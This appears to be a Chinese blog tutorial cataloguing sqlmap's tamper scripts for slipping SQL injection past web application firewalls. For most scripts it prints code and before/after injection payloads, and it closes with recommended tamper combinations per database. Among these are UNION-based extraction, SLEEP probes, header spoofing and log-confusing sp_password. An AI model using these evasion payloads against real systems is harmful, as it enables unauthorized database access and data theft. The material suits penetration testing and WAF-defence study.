sqlmap相信每个安全从业者都耳熟能详,作为一枚菜鸡安全从业者也不例外,但是平时使用过程中仅仅停留在表层,尤其是对于其中的绕waf的tamper脚本方面,只会一通乱怂,怂不下来就撤,但是一直这样也不是办法,于是就想着了解每个tamper脚本的作用且针对什么数据库有效,了解之后再去修改编写自己的tamper脚本,这样才能更好的辅助我们日常的工作。关于sqlmap的使用大家可以食用超详细SQLMap使用攻略及技巧分享

使用方法

1
sqlmap.py XXXXX --tamper "模块名"

各个tamper的作用

下面就针对sqlmap自带的tamper脚本做一个简单介绍。

1.apostrophemask.py
1
return payload.replace('\'', "%EF%BC%87") if payload else payload

将单引号进行url编码,用于过滤了单引号的情况。

1
1' AND '1'='1 to 1%EF%BC%87 AND %EF%BC%871%EF%BC%87=%EF%BC%871

适用数据库:ALL

2.apostrophenullencode.py
1
return payload.replace('\'', "%00%27") if payload else payload

将单引号替换为unicode字符%00%27,用于过滤了单引号的情况。

1
1 AND '1'='1 to 1 AND %00%271%00%27=%00%271

适用数据库:ALL

3.appendnullbyte.py
1
return "%s%%00" % payload if payload else payload

在有效payload结束位置添加%00

1
'1 AND 1=1' to '1 AND 1=1%00'

适用数据库:Access

4.base64encode.py
1
return encodeBase64(payload, binary=False) if payload else payload

使用base64进行编码替换

1
1' AND SLEEP(5)# to MScgQU5EIFNMRUVQKDUpIw==

适用数据库:ALL

5.between.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
retVal = payload

if payload:
    match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)

    if match:
        _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
        retVal = retVal.replace(match.group(0), _)
    else:
        retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload)

    if retVal == payload:
        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload)

        if match:
            _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
            retVal = retVal.replace(match.group(0), _)

return retVal

将大于符号和等号用between语句替换,用于过滤了大于符号和等号的情况。

1
2
3
1 AND A > B-- to 1 AND A NOT BETWEEN 0 AND B--
1 AND A = B-- to 1 AND A BETWEEN B AND B--
1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID() to 1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()

适用数据库:ALL

6.bluecoat.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords:
            return match.group().replace(word, "%s%%09" % word)
        else:
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal)
        retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
        retVal = retVal.replace("%09 ", "%09")

    return retVal

用随机的空白字符代替空格,并且将等号替换为like,用于过滤了空格和等号的情况。

1
SELECT id FROM users WHERE id = 1 to SELECT%09id FROM%09users WHERE%09id LIKE 1

适用数据库:MySQL 5.1, SGOS

7.chardoubleencode.py

双url编码

1
SELECT FIELD FROM%20TABLE to %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

适用数据库:ALL

8.charencode.py

url编码,用url编码一次你的payload

1
SELECT FIELD FROM%20TABLE to %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

适用数据库:ALL

9.charunicodeencode.py

用unicode url编码payload ,只编码非编码

1
SELECT FIELD%20FROM TABLE to %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

适用数据库:ALL,但是需要asp和asp.net环境

10.charunicodeescape.py

把指定的payload反向编码未编码的字符

1
SELECT FIELD FROM TABLE to \\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045

适用数据库:…

11.commalesslimit.py

将payload中的逗号用offset代替,用于过滤了逗号并且是两个参数的情况

1
LIMIT 2, 3 to LIMIT 3 OFFSET 2

适用数据库:MySQL

12.commalessmid.py

将payload中的逗号用from for 代替,用于过滤了逗号并且是三参数的情况,

1
MID(VERSION(), 1, 1) to MID(VERSION() FROM 1 FOR 1)

适用数据库:MySQL

13.commentbeforeparentheses.py
1
retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal)

在括号前加

1
2
```bash
SELECT ABS(1) to SELECT ABS/**/(1)

适用数据库:ALL

14.concat2concatws.py
1
payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),")

替换CONCAT为CONCAT_WS,用于过滤了concat函数的情况

1
CONCAT(1,2) to CONCAT_WS(MID(CHAR(0),0,0),1,2)

适用数据库:MySQL

15.equaltolike.py
1
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)

将等号替换成like,用于过滤了等号的情况

1
SELECT * FROM users WHERE id=1 to SELECT * FROM users WHERE id LIKE 1

适用数据库:ALL

16.escapequotes.py
1
return payload.replace("'", "\\'").replace('"', '\\"')

将双引号替换成\\,用于过滤了双引号的情况

1
1" AND SLEEP(5)# to 1\\\\" AND SLEEP(5)#

适用数据库:ALL

17.greatest.py

用greatest代替大于符号,用于过滤了大于符号的情况

1
1 AND A > B to 1 AND GREATEST(A,B+1)=A

适用数据库:ALL

18.halfversionedmorekeywords.py

在每个关键词前面加注释,用于过滤了关键字的情况

1
value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa to value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa

适用数据库:MySQL < 5.1

19.hex2char.py

将每个编码后的字符转换成等价表达,既用等价的CONCAT(CHAR(),…)对应替换每个(MySQL)0x 编码的字符串

1
SELECT 0xdeadbeef to SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))

适用数据库:MySQL 4, 5.0 and 5.5

20.htmlencode.py
1
return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload

html编码所有非字母和数字的字符,将payload进行html编码

1
1' AND SLEEP(5)# to 1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;

适用数据库:…

21.ifnull2casewhenisnull.py

改变ifull语句的写法,用于绕过过滤了ifnull()函数的Web应用程序防火墙

1
IFNULL(1, 2) to CASE WHEN ISNULL(1) THEN (2) ELSE (1) END

适用数据库:MySQL 5.0 and 5.5

22.ifnull2ifisnull.py

替换ifnull为if(isnull(A))

1
IFNULL(1, 2) to IF(ISNULL(1),2,1

适用数据库:MySQL 5.0 and 5.5

23.informationschemacomment.py
1
retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)

标示符后添加注释,在information_schema后面加内联注释符,用于绕过对information-schema的情况

1
SELECT table_name FROM INFORMATION_SCHEMA.TABLES to SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES

适用数据库:ALL

24.least.py

替换大于号为least,用于过滤了大于号的情况

1
1 AND A > B to 1 AND LEAST(A,B+1)=B+1

适用数据库:MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

25.lowercase.py

全部替换为小写值,既将payload当中的大写转为小写

1
INSERT to insert

适用数据库:ALL

26.luanginx.py

用于绕过Lua nginx WAF,Lua nginx WAF不支持处理超过100个参数

1
1 AND 2>1 to 34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1

适用:Lua nginx WAF

27.modsecurityversioned.py

添加完整的查询版本的注释,用注释来包围完整的查询语句,用于绕过ModSecurity 开源WAF

1
1 AND 2>1-- to 1 /*!30963AND 2>1*/--

适用数据库:MySQL 5.0

28.modsecurityzeroversioned.py

添加完整的查询版本的注释,用注释来包围完整的查询语句,用于绕过 waf ,和上面类似

1
1 AND 2>1-- to 1 /*!00000AND 2>1*/--

适用数据库:MySQL 5.0

29.multiplespaces.py

在关键字周围添加多个空格

1
1 UNION SELECT foobar to 1     UNION     SELECT     foobar

适用数据库:ALL

30.overlongutf8.py

转换给定的payload当中的所有字符

1
SELECT FIELD FROM TABLE WHERE 2>1 to SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1

适用数据库:ALL

31.overlongutf8more.py

指定的payload转换所有字符

1
SELECT FIELD FROM TABLE WHERE 2>1 to %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1

适用数据库:ALL

32.percentage.py

每个字符前添加%,用百分号来绕过关键字过滤,具体是在关键字的每个字母前面都加一个百分号

1
SELECT FIELD FROM TABLE to %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

适用数据库:ALL,但是需要asp环境

33.plus2concat.py

将加号替换为concat函数,用于加号被过滤的情况

1
2
SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL 
SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL

适用数据库:Microsoft SQL Server 2012+

34.plus2fnconcat

将加号替换为ODBC函数{fn CONCAT()},用于加号别过滤的情况

1
2
SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL 
SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL

适用数据库:Microsoft SQL Server 2008+

35.randomcase.py

字符大小写随机替换,将payload随机大小写,可用于大小写绕过的情况

1
SELECT id FROM `user` to SeLeCt id FrOm `user`

适用数据库:ALL

36.randomcomments.py
payload 的关键字中间随机插入```/**/``` ,可用于绕过关键字过滤
1
2
```bash 
INSERT to I/**/NS/**/ERT

适用数据库:ALL,但是需要asp环境

37.sp_password.py

追加sp_password字符串,在payload语句后天机sp_password,用于迷惑数据库日志

1
1 AND 9227=9227--  to 1 AND 9227=9227-- sp_password

适用数据库:MsSSQL

38.space2comment.py

空格替换为

1
2
```bash
SELECT id FROM users to SELECT/**/id/**/FROM/**/users

适用数据库:ALL

39.space2dash.py

用注释符–和一个随机字符串加一个换行符替换空格字符
Replaces space character (‘ ‘) with a dash comment (‘–’) followed by a random string and a new line (‘\n’)

1
1 AND 9227=9227 to 1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227

适用数据库:MSSQL、SQLite

40.space2hash.py

空格替换为#加随机字符,用#和一个随机字符串加一个换行符替换空格字符

1
1 AND 9227=9227 to 1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227

适用数据库:MySQL 4.0, 5.0

41.space2morecomment.py

空格替换为

1
2
```bash
SELECT id FROM users to SELECT/**_**/id/**_**/FROM/**_**/users

适用数据库:MySQL 5.0 and 5.5

42.space2morehash.py

空格替换为#加随机字符及换行符,和 space2hash.py 类似,这里多一个 # 和换行符,具体如下

1
2
3
1 AND 9227=9227 to 1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227

1 AND 9227=9227 to 1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227

适用数据库:MySQL >= 5.1.13

43.space2mssqlblank.py
1
blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')

用一组有效的备选字符集当中的随机空白符替换空格符,以上这些随机空白符替换payload中的空格

1
SELECT id FROM users to SELECT%0Did%0DFROM%04users

适用数据库:SQL Server

44.space2mssqlhash.py

用 # 加一个换行符替换 payload 中的空格

1
1 AND 9227=9227 to 1%23%0AAND%23%0A9227=9227

适用数据库:MSSQL、MySQL

45.space2mysqlblank.py
1
blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')

用一组有效的备选字符集当中的随机空白符替换空格符

1
SELECT id FROM users to SELECT%A0id%0CFROM%0Dusers

适用数据库:MySQL

46.space2mysqldash.py

用破折号注释符“–”其次是一个换行符替换空格符

1
1 AND 9227=9227 to 1--%0AAND--%0A9227=9227

适用数据库:MySQL、MSSQL

47.space2plu.py

用加号“+”替换空格

1
SELECT id FROM users to SELECT+id+FROM+users

适用数据库:ALL

48.space2randomblank.py
1
blanks = ("%09", "%0A", "%0C", "%0D")

用一组有效的备选字符集当中的随机空白符替换空格符

1
SELECT id FROM users to SELECT%0Did%0CFROM%0Ausers

适用数据库:ALL

49.substring2leftright.py

PostgreSQL中将substring函数用left right函数代替

1
2
SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1) to LEFT((SELECT usename FROM pg_user)::text,1)
SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1) to LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)

适用数据库:PostgreSQL

50.symboliclogical.py
1
retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))
&& 替换 and ,用 || 替换 or ,用于这些关键字被过滤的情况```
1
2
3
```bash
1 AND '1'='1 to 1 %26%26 '1'='1
1 or 1=1 to 1 %7c%7c 1=1

适用数据库:ALL

51.unionalltounion.py
1
return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload

用union all select替换为union select

1
-1 UNION ALL SELECT to -1 UNION SELECT

适用数据库:ALL

52.unmagicquotes.py

用宽字符绕过GPC,一个多字节组合%bf%27和末尾通用注释一起替换空格符

1
1' AND 1=1 to 1%bf%27-- -

适用数据库:ALL

53.uppercase.py

将payload全部替换为大写值

1
insert to INSERT

适用数据库:ALL

54.varnish.py

添加一个HTTP头“X-originating-IP”来绕过WAF
且可以自定义:

1
2
3
4
5
X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
X-remote-IP: * or %00 or %0A

适用数据库:ALL

55.versionedkeywords.py

用MySQL注释包围每个非函数的关键字

1
2
3
4
5
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# 

to

1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

适用数据库:MySQL

56.versionedmorekeywords.py

用MySQL注释包围每个关键字,使用注释绕过

1
2
3
4
5
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

to

1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
57.xforwardedfor.py
1
2
3
4
headers = kwargs.get("headers", {})
headers["X-Forwarded-For"] = randomIP()
headers["X-Client-Ip"] = randomIP()
headers["X-Real-Ip"] = randomIP()

添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF

适用数据库:ALL

一些常用的tamper组合

通用的测试tamper
1
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
Microsoft SQL Server
1
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL
1
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
Oracle
1
tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor
Microsoft Access
1
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
PostgreSQL
1
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor
序号 脚本名称 作用
1 apostrophemask 单引号替换为Utf8字符
2 apostrophenullencode 替换双引号为%00%27
3 appendnullbyte 有效代码后添加%00
4 base64encode 使用base64编码
5 between 比较符替换为between
6 bluecoat 空格替换为随机空白字符,等号替换为like
7 chardoubleencode 双url编码
8 charencode 将url编码
9 charunicodeencode 使用unicode编码
10 charunicodeescape 以指定的payload反向编码未编码的字符
11 commalesslimit 改变limit语句的写法
12 commalessmid 改变mid语句的写法
13 commentbeforeparentheses 在括号前加内联注释
14 concat2concatws 替换CONCAT为CONCAT_WS
15 equaltolike 等号替换为like
16 escapequotes 双引号替换为\\
17 greatest 大鱼号替换为greatest
18 halfversionedmorekeywords 在每个关键字前加注释
19 hex2char 将每个编码后的字符转换为等价表达
20 htmlencode html编码所有非字母和数字的字符
21 ifnull2casewhenisnull 改变ifnull语句的写法
22 ifnull2ifisnull 替换ifnull为if(isnull(A))
23 informationschemacomment 标示符后添加注释
24 least 替换大于号为least
25 lowercase 全部替换为小写值
26 luanginx 用于绕过Lua nginx WAF,Lua nginx WAF不支持处理超过100个参数
27 modsecurityversioned 空格替换为查询版本的注释
28 modsecurityzeroversioned 添加完整的查询版本的注释
29 multiplespaces 添加多个空格
30 overlongutf8 将所有字符转义为utf8
31 overlongutf8more 以指定的payload转换所有字符
32 percentage 每个字符前添加%
33 plus2concat 将加号替换为concat函数
34 plus2fnconcat 将加号替换为ODBC函数{fnCONCAT()}
35 randomcase 字符大小写随机替换
36 randomcomments /**/分割关键字
37 sp_password 追加sp_password字符串
38 space2comment 空格替换为/**/
39 space2dash 空格替换为-加随机字符
40 space2hash 空格替换为#加随机字符
41 space2morecomment 空格替换为/_/
42 space2morehash 空格替换为#加随机字符及换行符
43 space2mssqlblank 空格替换为其他空符号
44 space2mssqlhash 空格替换为%23%0A
45 space2mysqlblank 空格替换为其他空白符号
46 space2mysqldash 空格替换为-%0A
47 space2plus 空格替换为加号
48 space2randomblank 空格替换为备选字符集中的随机字符
49 substring2leftright PostgreSQL中将substring函数用left right函数代替
50 symbliclogical AND和OR替换为&&和
51 unionalltounion union all select 替换为union select
52 unmagicquotes 宽字符绕过GPC
53 uppercase 全部替换为大写值
54 varnish 添加HTTP头
55 versionedkeywords 用注释封装每个非函数的关键字
56 versionedmorekewords 使用注释绕过
57 xforwardedfor 添加伪造的HTTP头

参考文章:

使用sqlmap中tamper脚本绕过waf
sqlmap tamper 脚本列表
sqlmap的tamper详解
sqlmap注入之tamper绕过WAF脚本列表